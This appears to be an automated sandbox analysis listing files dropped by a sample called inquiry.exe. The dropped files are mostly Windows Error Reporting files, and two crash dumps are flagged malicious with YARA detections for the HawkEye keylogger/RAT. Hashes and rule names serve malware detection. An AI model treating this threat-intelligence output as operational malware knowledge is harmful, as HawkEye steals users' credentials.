                                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.0.1.8.1.7.2.0.5.3.8.0.2.5.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.0.1.8.1.7.2.2.1.3.1.7.7.8.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.7.e.5.1.0.d.1.-.c.c.b.4.-.4.5.8.4.-.8.e.d.d.-.e.d.1.2.8.8.9.c.0.1.1.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.0.8.-.0.0.0.1.-.0.0.1.b.-.8.5.b.b.-.c.f.5.b.b.3.b.d.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.2.9.9.0.e.1.8.8.e.c.d.5.a.7.e.8.7.1.b.9.7.a.6.a.4.c.b.7.b.b.8.0.0.0.0.f.f.f.f.!.0.0.0.0.5.3.a.e.0.b.5.7.6.f.7.b.3.6.2.b.9.0.a.2.5.a.c.e.1.4.7.0.d.3.3.0.6.8.d.b.4.4.9.0.!.I.N.Q.U.I.R.Y...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.0././.1.1././.1.8.:.0.7.:.4.5.:.1.7.!.0.!.I.N.Q.U.I.R.Y...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.t.A.s.I.d.=.3.6.2.....I.s.F.a.t.a.l.=.4.2.9.4.9.6.7.2.
                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_inquiry.exe_e6c573bafb277a8e53b04fdad891cf6b8aba558_00000000_1b4a9849\Report.wer
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):18450
                                                                      Entropy (8bit):3.7581638227883536
                                                                      Encrypted:false
                                                                      SSDEEP:192:B8y+H0Ti+VJjV/C9yq5bMvg/LHZ+nNN2I1rzvq5xk0z5xT5/u7sSS274Itj:kH0VjB7vqsSt/u7sSX4Itj
                                                                      MD5:4E9027E389CF59A8E643336BC538513A
                                                                      SHA1:5FC1F51DA07FA44C69EF4DC8C46AF896176E76F0
                                                                      SHA-256:5E35F7BEAF0E442F1923D24380FE8A32309325B08F6C6815AC221527631AEBEF
                                                                      SHA-512:77A94A00184189C927B7EF97D7308D0E5B629B080DF48CA7DB95BF8C0210E2E37F06377AD55CE8187E4E60F07AB2099AAC49A6B52D76EC1BFF39BC666F852C77
                                                                      Malicious:false
                                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.0.1.8.1.7.6.0.0.6.9.1.4.6.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.0.1.8.1.7.6.3.0.2.2.2.6.3.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.5.9.7.0.9.0.f.-.0.7.a.4.-.4.7.5.1.-.b.9.c.9.-.7.e.3.7.7.2.5.9.1.0.a.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.9.8.-.0.0.0.1.-.0.0.1.b.-.6.1.2.3.-.c.6.7.6.b.3.b.d.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.2.9.9.0.e.1.8.8.e.c.d.5.a.7.e.8.7.1.b.9.7.a.6.a.4.c.b.7.b.b.8.0.0.0.0.f.f.f.f.!.0.0.0.0.5.3.a.e.0.b.5.7.6.f.7.b.3.6.2.b.9.0.a.2.5.a.c.e.1.4.7.0.d.3.3.0.6.8.d.b.4.4.9.0.!.I.N.Q.U.I.R.Y...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.0././.1.1././.1.8.:.0.7.:.4.5.:.1.7.!.0.!.I.N.Q.U.I.R.Y...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.t.A.s.I.d.=.3.7.8.....I.s.F.a.t.a.l.=.4.2.9.4.9.6.7.2.
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:Mini DuMP crash report, 14 streams, Wed Nov 18 14:02:15 2020, 0x60521 type
                                                                      Category:dropped
                                                                      Size (bytes):7008087
                                                                      Entropy (8bit):4.7220376102848896
                                                                      Encrypted:false
                                                                      SSDEEP:98304:dYMlAY0P5P9Hch291r+VT8b1XanA8ngFYT3bRnCSljd5XSoU+zR8MX:djAYaP9HNgGwFJ/5Xv
                                                                      MD5:B959EB0600252402A18BFCF647E10552
                                                                      SHA1:0626EAF638F4FEF2920A77E3BC56740E52E126C5
                                                                      SHA-256:92E8F1B478C7EB956AD40A33A3739229D6C1ACB0793A32A327CF426C6CCE2A77
                                                                      SHA-512:A61C0109EBA44B3ECECA58A5D3DE320553FEE491B820638D50B266122604F6BD3B75660C745BA011C717FEA2E24C15C4AAFC5D49CCF254478E99D55B5A5EF00C
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, Author: JPCERT/CC Incident Response Group
                                                                      Preview: MDMP....... .......g)._!..................U...........B.......8......GenuineIntelW...........T...........M)._.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER2E55.tmp.WERInternalMetadata.xml
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):8294
                                                                      Entropy (8bit):3.7043697131252022
                                                                      Encrypted:false
                                                                      SSDEEP:192:Rrl7r3GLNii06Yb6YPI6Egmf0uuS8+prk89bb9sfnpm:RrlsNiJ6s6Yw6EgmfPuSRb2fE
                                                                      MD5:878E1942EA193A0986BDC8426E80F69E
                                                                      SHA1:D47C31FC7B12BA957F6D61AB8E0C5FFDCE2585D6
                                                                      SHA-256:B31B2972C250517AF12D08CD15DE379C47B1FAA215DF97926D7227400370543A
                                                                      SHA-512:BEBD8D8ECEBD5466E4CBC6303EBEC7879A8D6C02057DADCCA7B56E117F426849E56E3E9BBF21F477C3D2EA83ECC2D55D427F756E57942950AA5826416B2B6426
                                                                      Malicious:false
                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.8.9.6.<./.P.i.d.>.......
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER3043.tmp.WERInternalMetadata.xml
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):5640
                                                                      Entropy (8bit):3.724414552767444
                                                                      Encrypted:false
                                                                      SSDEEP:96:RtIU6o7r3GLt3i+s6ROcYZtuvUubSfaQgsB+aM1911fH/m:Rrl7r3GLNi+s6ROcYZtuvUubS7+p191g
                                                                      MD5:3ACCC42FCA2CB02425C8B5FEB60C324D
                                                                      SHA1:2EF2A521BF4C9A6F3FA58C56A803D919B985BBE7
                                                                      SHA-256:2ECDDEC9C38A915BD80665FAFBE7779795C1342454EA3C57D8D682FA52A2089E
                                                                      SHA-512:B0813E81B0FA83DEF1700D5B4199F8CA0A8148B07319D158FE513094230C2A355E977F31BE21656C0A92D8B6B46B38C523E21582FEC509DEDA162DACEF37ADD8
                                                                      Malicious:false
                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.4.0.<./.P.i.d.>.........
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER3106.tmp.xml
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4587
                                                                      Entropy (8bit):4.510625392276364
                                                                      Encrypted:false
                                                                      SSDEEP:48:cvIwSD8zs6JgtWI9OK6oWSC8BP8fm8M4JOWjZF5+q89zCpJP6v4HTd:uITfI4aSNKJOgtsCvP6vMTd
                                                                      MD5:A8469566DD777304B6389CE1094F7028
                                                                      SHA1:E5C9D56772A35FD2D8DCA937B993B3F4C092F9B9
                                                                      SHA-256:507E6016E8640ECE9E662D46F13B0C0322C64175A78028E65A471791CF7EB03D
                                                                      SHA-512:8B6460D77CE2B91024D10532ABD27E990F723E906AABC28F2EC02F85301A9A37953DE7BACEBFA1AD1D85FB11F2ECDD7A443C03F3598C42EBD7A9A48A5FF51F43
                                                                      Malicious:false
                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="734352" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER310F.tmp.xml
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4609
                                                                      Entropy (8bit):4.454622515385555
                                                                      Encrypted:false
                                                                      SSDEEP:48:cvIwSD8zsUJgtWI9OK6oWSC8Bw08fm8M4JFKg7FT9P+q8v5bpJP6v4H+d:uITfS4aSNYJFKMKVvP6vM+d
                                                                      MD5:E90B24327D824129769567901CF443FD
                                                                      SHA1:136452E7C618931A5D39470F24C97B3CE9FB8858
                                                                      SHA-256:27C78A3143AFDA038D4939AED93E3CB8B249CC9032C6568D01BAC4B57B298BAE
                                                                      SHA-512:BE3CA69E21A0B60EDA1C09659DF6968ADA039FC12791ED077D5E1026E587C40DED3E4FD91A75BAEEE238633622C31D183F440CC241D58E08FF789477FB409854
                                                                      Malicious:false
                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="734354" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER6231.tmp.WERInternalMetadata.xml
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):5644
                                                                      Entropy (8bit):3.725672845251971
                                                                      Encrypted:false
                                                                      SSDEEP:96:RtIU6o7r3GLt3i4W6hn/OY6TYZtuvUubSfaQgsB+aM1jM1fohm:Rrl7r3GLNi4W6h/OlTYZtuvUubS7+p1k
                                                                      MD5:0EF540DE4DBDF43FBCFEE50AB55FA136
                                                                      SHA1:7ECED9AE0FCF5AAC17BF09D4114C09D2285FC38E
                                                                      SHA-256:8DAEF505D2FE71360A1544D35C3E1ACBE7AE5A4EFF9617AC844B591E55E9DCB1
                                                                      SHA-512:9C771D8C01F602E3732F32990596ED9C8E833AF86C91F507D402CF14B1E5DEBEE53BA9CED202C1BB40F667B4DDB904AB419A4387464F30E5F72D93F60D639D4D
                                                                      Malicious:false
                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.3.6.4.<./.P.i.d.>.......
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER6389.tmp.xml
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4609
                                                                      Entropy (8bit):4.456846137432615
                                                                      Encrypted:false
                                                                      SSDEEP:48:cvIwSD8zsUJgtWI9OK6oWSC8B48fm8M4JFKg7F98+q8v5epJP6v4Hdd:uITfS4aSN3JFKDKovP6vMdd
                                                                      MD5:2ABC6F088DE2C790C718E4B5C042A11F
                                                                      SHA1:663A6B84DE9F3B0284CB8F8F56F68836D59199BA
                                                                      SHA-256:B78C0C1912AF53D5A3855576A4F1759E27E916D0CDDEA8F9ECD6B179302BB31D
                                                                      SHA-512:2145C163BEF734A90F38DB9ABF56E6EDA5BB1E3CE77AC22F5ABE411C4E98191C4DC8B68588BEE18AA157139F546DECF73A2322C7C2326BFDF2870B94A3638C26
                                                                      Malicious:false
                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="734354" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:Mini DuMP crash report, 14 streams, Wed Nov 18 14:03:43 2020, 0x60521 type
                                                                      Category:dropped
                                                                      Size (bytes):7022802
                                                                      Entropy (8bit):4.717144579527239
                                                                      Encrypted:false
                                                                      SSDEEP:98304:XYPlBtHP569HBpwU1r+VTnb1XaFA8nPtYT3bMriGfjTsXDaIoUL8Md:X6Btx69HAV4YQhfsXb
                                                                      MD5:FEAD06C9C1479F402088C5790CB54810
                                                                      SHA1:98E6C5DBB08872323131736E654FA53615B587B4
                                                                      SHA-256:E5C77118B53DF48454D8706ADB3AA5E603848B19056510A90343E9C8229EEBC6
                                                                      SHA-512:BC34879B56421682EF50B6B1EAA7D8CE9D3120567037B8213FC36ACCAB9218CE55125A98552CF3ED34CA2D1E7D98D8F107C0F286F2345EB138C9C351491C32A4
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, Author: JPCERT/CC Incident Response Group
                                                                      Preview: MDMP....... ........)._!..................U...........B.......8......GenuineIntelW...........T.......T....)._.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER8867.tmp.WERInternalMetadata.xml
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):6324
                                                                      Entropy (8bit):3.732480537668084
                                                                      Encrypted:false
                                                                      SSDEEP:192:Rrl7r3GLNi4Z6mY0uuS8+prI89bkcsfrsm:RrlsNi+6mYPuSFkvf1
                                                                      MD5:443C182B00527E31B1E4AD64BFFA8241
                                                                      SHA1:F1D745B2744B4224FD43AE752DAA83B8E7FB10E8
                                                                      SHA-256:25D2AD246A4ACEB2DBF6DD75A5DD3B06CC824F525D990939B860A4E259E71E64
                                                                      SHA-512:36978C6151C7001BF4AF5C4D7AB4510EADD05EB048E435BD1C1A61809B4003CB2F6D5AE7F6C9074952C5C121C793F337EF2886D30FE662B18BA622FFE1E1E029
                                                                      Malicious:false
                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.3.6.4.<./.P.i.d.>.......
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER8933.tmp.xml
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4587
                                                                      Entropy (8bit):4.5076470925802195
                                                                      Encrypted:false
                                                                      SSDEEP:48:cvIwSD8zsUJgtWI9OK6oWSC8Bn8fm8M4JOWjZFz+q89z8pJP6v4Hud:uITfS4aSN+JOgns8vP6vMud
                                                                      MD5:52FC903ED30F5B61BA8F727424907241
                                                                      SHA1:40816AF32399226225A46FA9841CC819A894B75A
                                                                      SHA-256:CD4FF732AB018C9AAC4D92F681006C0FB246283D3ADC6A040F8CA7B31F48FF38
                                                                      SHA-512:51706A5090F26418194DFC10146F7D906A7E4E203FFDBE7BFB1FDE179C53FAE6B32AE0134F083A50E07B78FA3B020A968C9CA773CCA4A45A8FEB8AEC48BAAC8B
                                                                      Malicious:false
                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="734354" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER89A3.tmp.WERInternalMetadata.xml
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):5644
                                                                      Entropy (8bit):3.727574879681056
                                                                      Encrypted:false
                                                                      SSDEEP:96:RtIU6o7r3GLt3iGQA6pOPYZtuvUubSfaQgsB+aM1YC1fYAUom:Rrl7r3GLNiG/6pAYZtuvUubS7+p1YC1S
                                                                      MD5:B3060F69B30CC0B7BE8A0EEBBC0F66AE
                                                                      SHA1:14ED5EC297764359163C1F4AF27BA5D9CD96F73B
                                                                      SHA-256:E42AE8026F9C077C31416C917B6B9EBE48907C17E9D392B0B900FA94CB1F7121
                                                                      SHA-512:514FE1126AF8F28F5A2E99DD6D8B441CC185879EF3FC73AEE025356DDCA920109D43E26E994BC43E62AB9A15A0181FFDCA346ACE6F14CC4ED7A1B5B915B25D2D
                                                                      Malicious:false
